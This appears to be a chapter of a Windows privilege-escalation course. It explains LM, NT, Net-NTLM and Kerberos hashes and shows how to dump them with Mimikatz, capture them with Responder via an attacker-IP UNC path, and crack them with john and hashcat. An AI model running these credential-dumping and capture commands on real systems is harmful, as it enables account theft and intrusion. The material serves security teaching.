12 - Windows Hashes

Topics

  1. Introduction to the Windows Shells

  2. Windows Permissions

  3. Reverse Shells in Windows

  4. SeImpersonatePrivilege Exploitation

  5. On Cross Compilation

  6. Windows Services

  7. Weak Service Permissions

  8. Unquoted Service Path

  9. DLL Hijacking

  10. Always Install Elevated

  11. Files with Sensitive Data

  12. Windows Hashes

  13. Stored Credentials and the Windows Vault

  14. Scheduled Task

  15. Critical Registry Paths

  16. Useful Tools

  17. AMSI Bypass

Hash Functions

Hash functions are cryptographic tools that transform input data (e.g., passwords) into fixed-length values called hashes. These are one-way functions, meaning it is computationally infeasible to retrieve the original input from the hash.

Example using sha256:

$ echo -n "leonardo" | sha256sum
18ccba186d8757c20cbf05d7a98b2c64f9f16eb64ea4a64659bbc5c9b7b3a7fe  -

Authentication

Hash functions are widely used in authentication to protect user credentials. Passwords are hashed before storage, ensuring that even if the database is compromised, the plaintext passwords remain undisclosed.

Authentication Workflow:

  1. User provides password P.

  2. Application computes H(P) (hash of the password).

  3. The hash H(P) is compared to the stored hash.

  4. Authentication succeeds if the hashes match.


Windows Hashes

Windows uses several hash formats for authentication and data protection.

LM (LAN Manager) Hash

  • Legacy format inherited from LAN Manager; not stored by default since Windows Vista / Server 2008 (NoLMHash = 1), but still found on older systems, in old SAM backups, and on machines where the policy was switched off.

  • Algorithm:

    1. Truncate the password to 14 characters and convert it to uppercase (case is lost).

    2. Null-pad to 14 bytes.

    3. Split into two independent 7-byte halves.

    4. Expand each 7-byte half into a 56-bit DES key and encrypt the constant "KGS!@#$%" with it.

    5. Concatenate the two 8-byte ciphertexts into the 16-byte LM hash.

  • Because the halves are independent and uppercase, an attacker cracks two 7-character keyspaces instead of one 14-character one. A password of 7 characters or fewer leaves the second half equal to the DES encryption of the constant under an all-zero key, AAD3B435B51404EE, so that value in a dump means "no second half", and AAD3B435B51404EEAAD3B435B51404EE means no LM hash is stored at all.

Check LM Hash Configuration:

Get-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'NoLMHash'

A value of 1 (the default since Vista) means no LM hash is written when a password is set or changed; an LM hash already in the SAM survives until the next password change, so a dump can still contain one.

NTLM Hash

  • Modern Windows systems store the NT hash (commonly called the NTLM hash) in the local SAM and, for domain accounts, in NTDS.dit on the domain controllers.

  • Algorithm:

    NTLM = MD4(UTF-16-LE(password))

  • There is no salt and no 14-character limit: the same password always gives the same hash, and the hash itself is a valid credential (pass-the-hash), so a dumped NT hash does not need to be cracked to be used.

  • Example: NTLM hash of "password" is:

    8846F7EAEE8FB117AD06BDD830B7586C

Net-NTLMv1

  • Used in challenge/response authentication (the NTLM protocol over SMB, HTTP, LDAP and others); the password hash never crosses the wire, only a response computed from it.

  • Algorithm:

    response = DES(K1, C) | DES(K2, C) | DES(K3, C)

    • C: 8-byte server challenge.

    • K1, K2, K3: the 16-byte NT hash is padded with 5 null bytes to 21 bytes and split into three 7-byte DES keys.

  • The third key holds only 2 bytes of the NT hash plus five zeros, so it falls to 2^16 DES operations, and the other two are single 56-bit DES keyspaces independent of the password length. A captured NTLMv1 response therefore gives up the NT hash itself (usable for pass-the-hash), not just the password. A variant of the same construction uses the LM hash in place of the NT hash.


Net-NTLMv2

  • Successor to NTLMv1; uses HMAC-MD5 keyed with the NT hash and mixes in the username, the domain, a timestamp and a client challenge.

  • Algorithm:

    v2-Hash = HMAC-MD5(key = NT-Hash, data = UTF-16-LE(UPPERCASE(username) + domain))
    NTProofStr = HMAC-MD5(key = v2-Hash, data = server challenge + blob)
    response = NTProofStr + blob

    • blob: timestamp, 8-byte client challenge and the server's target information (AV pairs).

  • The username and domain act as a salt and the client contributes randomness, so every response is unique and the only offline attack is to guess passwords and recompute the HMACs. A captured Net-NTLMv2 response does not reveal the NT hash and cannot be used for pass-the-hash.

Check NTLM Compatibility:

Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name 'LMCompatibilityLevel'

The value is the policy "Network security: LAN Manager authentication level": 0 and 1 send LM and NTLMv1 responses, 2 sends NTLMv1 only, 3 sends NTLMv2 only, and 4 and 5 additionally make a domain controller refuse LM (4) or both LM and NTLMv1 (5). The property is often absent, in which case the OS default applies (3 on Windows 7 / Server 2008 R2 and later), which is why Responder normally captures Net-NTLMv2 rather than v1.

Kerberos

  • Default authentication protocol in Active Directory: the client obtains an encrypted Ticket Granting Ticket (TGT) from the KDC and then Service Tickets (TGS) for individual services.

  • Kerberos never transmits password hashes, but its long-term keys are derived from the password: the RC4-HMAC key (etype 23) is the NT hash itself, so a dumped NT hash can request tickets (overpass-the-hash), while the AES keys (etypes 17 and 18) are derived with PBKDF2 from the password and a salt built from the realm and username, so they cannot be computed from the NT hash alone.


DPAPI

  • The Windows Data Protection API (DPAPI) encrypts per-user secrets such as browser credentials, saved Wi-Fi and RDP passwords and private keys. Each user's DPAPI master keys are themselves encrypted with a key derived from the user's logon password (its SHA-1 or NT hash), so the password or hash of a user unlocks that user's DPAPI-protected data, and the domain backup key held by the domain controllers can decrypt any domain user's master keys.


Obtaining Hashes

LM, NTLM: SAM Dump with Mimikatz (SeDebugPrivilege or SeBackupPrivilege)

The hashes of local accounts live in the SAM hive, which only SYSTEM can read. With local administrator rights, Mimikatz enables SeDebugPrivilege, impersonates a SYSTEM token and reads the SAM directly:

mimikatz64.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"

Each account is listed with its RID and "Hash NTLM:"; an LM hash appears only if NoLMHash was off at the last password change. If you hold only SeBackupPrivilege (for example through the Backup Operators group) rather than full administrator rights, export the SAM and SYSTEM hives with reg save and run lsadump::sam offline against the two files: the SYSTEM hive holds the boot key needed to decrypt the SAM.

Net-NTLM: Using Responder

Responder captures Net-NTLMv1/v2 challenge/responses: it poisons LLMNR, NBT-NS and mDNS name lookups so that victims connect to the attacker's host, and its rogue SMB, HTTP and other servers issue a challenge and record the response.

  1. Install Responder:

    git clone https://github.com/lgandx/Responder.git
    cd Responder
    pip install -r requirements.txt
  2. Start Responder:

    sudo python3 Responder.py -I <network-interface>
  3. Trigger an SMB Connection from the Victim (any UNC path pointing at the attacker's IP works, whether typed, embedded in a file, or reached through a poisoned name):

    dir \\192.168.122.1\test

Captured Net-NTLMv2 hash (also written to Responder's logs directory, one line per capture, in the layout hashcat mode 5600 and john's netntlmv2 format expect):

NTLMv2-SSP Hash: User::Domain:<server challenge>:<NTProofStr>:<blob>

Cracking Windows Hashes

Required Tools:

  • John the Ripper

  • Hashcat

Common Wordlist:

Download rockyou.txt:

curl -L https://github.com/danielmiessler/SecLists/raw/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz | tar -xz

Cracking Commands (john takes the wordlist directly; for hashcat, -a 0 is the wordlist attack, whereas -a 3 is a brute-force mask attack that ignores the wordlist):

  • LM Hash:

    john --format=lm --wordlist=rockyou.txt hash.txt
    hashcat -m 3000 -a 0 hash.txt rockyou.txt
  • NTLM Hash:

    john --format=nt --wordlist=rockyou.txt hash.txt
    hashcat -m 1000 -a 0 hash.txt rockyou.txt
  • Net-NTLMv1:

    john --format=netntlm --wordlist=rockyou.txt hash.txt
    hashcat -m 5500 -a 0 hash.txt rockyou.txt
  • Net-NTLMv2:

    john --format=netntlmv2 --wordlist=rockyou.txt hash.txt
    hashcat -m 5600 -a 0 hash.txt rockyou.txt

An LM crack only recovers the uppercased password; use the account's NT hash to confirm the real case. For LM and NTLM, john accepts the full user:RID:LM:NT::: line of a SAM dump, while hashcat wants one bare hash per line; for Net-NTLM, hash.txt takes the captured lines exactly as Responder writes them.

Disclaimer

❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!
